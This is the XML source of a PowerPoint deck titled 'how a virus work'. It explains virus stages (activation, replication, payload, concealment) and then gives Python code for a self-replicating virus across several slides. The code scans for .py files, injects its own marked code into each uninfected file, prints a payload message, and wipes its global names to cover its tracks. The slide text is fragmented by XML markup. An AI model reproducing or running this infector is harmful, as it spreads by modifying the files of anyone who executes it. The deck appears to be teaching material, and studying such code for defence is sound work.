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6"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="306" r:id="rId5"/>
    <p:sldId id="307" r:id="rId6"/>
    <p:sldId id="308" r:id="rId7"/>
    <p:sldId id="314" r:id="rId8"/>
    <p:sldId id="316" r:id="rId9"/>
    <p:sldId id="318" r:id="rId10"/>
    <p:sldId id="319" r:id="rId11"/>
    <p:sldId id="320" r:id="rId12"/>
    <p:sldId id="321" r:id="rId13"/>
    <p:sldId id="311"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pc="400" dirty="0"/>
              <a:t>how a virus work</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4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attia Habib</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6391654" y="136525"/>
            <a:ext cx="4434840" cy="886968"/>
          </a:xfrm>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6391654" y="1068038"/>
            <a:ext cx="4434840" cy="5243767"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>to write a computer virus, Python is probably not the best choice at all. It’s an interpreted language and so it needs an interpreter to be executed. Yes, you can embed an interpreter to your virus, but your resulting virus will be heavier and a little clunky… let’s be clear, to write a virus probably other languages that can work to a lower level and that can be compiled are probably a better choice and that’s why in the old days it was very common to see viruses written in C or Assembly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> Despite this, you can still create computer viruses in Python, and you will see an example of this in this post.</a:t>
            </a:r>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2"/>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3"/>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4"/>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spc="400" dirty="0"/>
              <a:t>virus</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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15/6/2023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spc="400" dirty="0"/>
              <a:t>virus</a:t>
            </a:r>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Definition </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Activation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Replication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Concealment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>example </a:t>
            </a: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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Definition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dirty="0"/>
              <a:t>A computer virus is a type of malicious software ( designed to spread and infect computers and cause damage or disruption to their system and data. There are different types of computer viruses, but all of them follow a similar pattern of operation: </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pc="400" dirty="0"/>
              <a:t>virus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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Activation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dirty="0"/>
              <a:t>Activation: The virus must be activated, either by the user running a malicious program or opening an infected file, or by a pre-programmed trigger such as a specific date or time.</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pc="400" dirty="0"/>
              <a:t>virus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112434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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Replication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dirty="0"/>
              <a:t>Replication: The virus starts creating copies of itself, infecting other files and systems, and spreading to other computers through networks, emails, or removable media </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pc="400" dirty="0"/>
              <a:t>virus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60294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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Concealment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85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Concealment: The virus seeks to hide its presence and evade detection by antivirus software, by using techniques such as encryption, polymorphism, rootkit, or stealth tactics. Spreading: The virus continues to propagate and infect more computers, maintaining a network of compromised systems that can be used for further attacks or data theft. Overall, a computer virus is a dangerous and malicious program that can cause severe harm to personal, business or governmental computers. To prevent infections, it is crucial to have updated antivirus software, to be cautious when opening emails or downloading unknown files, and to avoid visiting suspicious or unsecured websites.</a:t>
            </a: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pc="400" dirty="0"/>
              <a:t>virus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339341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01889" y="804353"/>
            <a:ext cx="7350075" cy="5820381"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77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begin-virus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import glob</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def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find_files_to_infect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(directory =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return [file for file in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glob.glob</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r>
              <a:rPr lang="en-US" sz="1800" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>py</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def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get_content_of_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(file):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data = None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with open(file, "r") as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my_file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data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my_file.readlines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return data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def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get_content_if_infectable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(file):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data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get_content_of_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(file)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for line in data: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if "# begin-virus" in line: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return None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return data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def infect(file,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if (data:=</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get_content_if_infectable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(file)):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with open(file, "w") as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infected_file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infected_file.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("".join(</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infected_file.writelines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(data)</a:t>
            </a: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pc="400" dirty="0"/>
              <a:t>virus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130870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01889" y="804353"/>
            <a:ext cx="7350075" cy="5820381"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92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def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get_virus_code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virus_code_on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = False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code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get_content_of_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(__file__)</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for line in code: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if "# begin-virus\n" in line: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virus_code_on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = True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if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virus_code_on</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virus_code.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(line)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if "# end-virus\n" in line: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virus_code_on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = False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break</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return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def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summon_chaos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 the virus payload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print("We are sick, fucked up and complicated\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nWe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> are chaos, we can't be cured")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pP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pc="400" dirty="0"/>
              <a:t>virus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4102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101889" y="804353"/>
            <a:ext cx="7350075" cy="5820381"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="850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entry point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try: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 retrieve the virus code from the current infected script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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>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get_virus_code</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 look for other files to infect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for file in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find_files_to_infect</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infect(file,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virus_code</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 call the payload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summon_chaos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except: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pass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finally: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 delete used names from memory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for i in list(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>globals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>().keys()):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if(i[0] != '_'):</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exec('del {}'.format(i))</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del i</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end-virus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>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spc="400" dirty="0"/>
              <a:t>virus</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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420066031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{18FBD862-EFC7-470A-A1D9-44777A7DCF70}tf89338750_win32</Template>
  <TotalTime>23</TotalTime>
  <Words>814</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Univers</vt:lpstr>
      <vt:lpstr>GradientUnivers</vt:lpstr>
      <vt:lpstr>how a virus work</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Definition</vt:lpstr>
      <vt:lpstr>Activation</vt:lpstr>
      <vt:lpstr>Replication</vt:lpstr>
      <vt:lpstr>Concealment</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virus work</dc:title>
  <dc:creator>Attiya Habib</dc:creator>
  <cp:lastModifiedBy>Attiya Habib</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-06-21T07:21:28Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-22T07:20:28Z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